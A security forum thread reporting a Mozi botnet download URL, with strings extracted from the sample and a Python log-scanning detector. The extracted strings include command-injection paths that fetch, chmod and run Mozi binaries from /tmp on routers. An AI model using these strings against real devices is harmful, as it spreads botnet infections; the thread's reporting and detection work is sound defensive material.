Author Topic: Only one to report this malware download?  (Read 470 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33194
  • malware fighter
Only one to report this malware download?
« on: May 09, 2021, 01:48:15 PM »
See: https://urlhaus.abuse.ch/url/1212440/
One to report: https://www.virustotal.com/gui/ip-address/101.180.105.163/detection
Now also reported here: https://ip-46.com/101.180.105.163#ip-feeds

Mozi has been designed specifically to attack low-power smart devices. Once installed, the malware tries to make contact with other infected devices, adding itself to the Mozi botnet. Once registered, the infected device continues to
According to the report, the Mozi botnet malware targets devices that use MIPS and ARM processors – both of which are very common in low-power smart home hardware. It also infects wireless routers.

DHT node on various addresses: https://www.shodan.io/search?query=101.180.105.163

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus
Re: Only one to report this malware download?
« Reply #1 on: May 10, 2021, 12:23:30 AM »
Here the malcode URI's workings are confirmed by running a URL extractor on it:
Quote
-http://%s:%d
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
-http://%s:%d/Mozi.a;sh
-http://%s:%d/Mozi.m
-http://%s:%d/Mozi.m+-O+-
-http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
-http://%s:%d/Mozi.m;/tmp/Mozi.m
-http://%s:%d/bin.sh
-http://%s:%d/bin.sh;chmod
-http://%s:%d/i
-http://%s:%d/i;chmod
-http://127.0.0.1
-http://baidu.com/%s/%s/%d/%s/%s/%s/%s) kicking up a search error
-http://ipinfo.io/ip
-http://purenetworks.com/HNAP1/
-http://schemas.xmlsoap.org/soap/encoding/
-http://schemas.xmlsoap.org/soap/envelope/
-http://schemas.xmlsoap.org/soap/envelope//
-http://www.w3.org/2001/XMLSchema
-http://www.w3.org/2001/XMLSchema-instance
All links are blocked by me with a leading - for obvious reasons.

polonus
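The extracted strings above are the request paths the bot sends to other devices, so they can be turned into a detection on the defender's side. The following is an added example, not code from the thread: it decodes the `+`/percent-encoded paths and matches web-server access-log lines (constructed sample lines, RFC 5737 test addresses) against the Mozi.a/Mozi.m, chmod 777, /tmp/, Netgear setup and HNAP1 markers quoted in this reply.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the strings quoted in Reply #1: the Mozi.a / Mozi.m
# droppers, the chmod 777 stage, execution from /tmp, the Netgear
# currentsetting.htm string and the HNAP1 probe. Example list, not a full rule set.
MOZI_MARKERS = {
    "mozi_dropper": re.compile(r"/Mozi\.[am]\b"),
    "chmod_777":    re.compile(r"chmod\s+777\s+Mozi\.[am]"),
    "tmp_exec":     re.compile(r"/tmp/(?:Mozi\.[am]|netgear)"),
    "netgear_cgi":  re.compile(r"currentsetting\.htm=1"),
    "hnap_probe":   re.compile(r"/HNAP1/"),
}

# Common Log Format: client - - [time] "METHOD path PROTO" status bytes
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(path):
    """Return the names of the Mozi markers found in one request path."""
    decoded = unquote_plus(path)  # '+' -> space, %xx -> char, as in the bot's URLs
    return [name for name, rx in MOZI_MARKERS.items() if rx.search(decoded)]

def scan_access_log(lines):
    """Return (client_ip, status, markers) for every request hitting a marker."""
    hits = []
    for line in lines:
        m = _CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        markers = classify_request(m.group("path"))
        if markers:
            hits.append((m.group("ip"), int(m.group("status")), markers))
    return hits

# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/May/2021:00:23:30 +0000] "GET /Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 400 0',
    '198.51.100.7 - - [10/May/2021:00:23:31 +0000] "GET /Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0" 404 162',
    '203.0.113.5 - - [10/May/2021:00:24:02 +0000] "POST /HNAP1/ HTTP/1.1" 404 162',
    '192.0.2.44 - - [10/May/2021:00:24:10 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, status, markers in scan_access_log(SAMPLE_LOG):
        print(ip, status, ",".join(markers))
```

A 400 or 404 on these paths, as in the first sample lines, means the device did not serve the bot's request; a 200 on a router's CGI endpoint is the line worth investigating.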

Offline polonus
Re: Only one to report this malware download?
« Reply #2 on: May 10, 2021, 03:45:16 PM »
And some attackers use UPX as a compressor of malware to bypass detection*:

Quote
-http://%s?o??:%d/Mo?.m+-O
-http://upx.sf.net  *
GET /-Mo?.m+-O HTTP/1.0
Host: -%s?o??:%d
User-Agent: Malzilla original browser
Referer: -http://%s?o??:%d/Mo?.m+-O
Accept-Encoding: gzip
Normally one should get a 400 Bad Request.

polonus
« Last Edit: May 10, 2021, 03:47:00 PM by polonus »

Offline polonus
Re: Only one to report this malware download?
« Reply #3 on: May 10, 2021, 07:46:29 PM »
Here the initial malware has apparently been cleansed:
Reported -> https://urlhaus.abuse.ch/url/1217299/
Scanned for: https://sitecheck.sucuri.net/results/https/salvajeglamping.com/wp-content/js_composer_/include/params/animation_style/HMYopU9fek
Extracted were:

polonus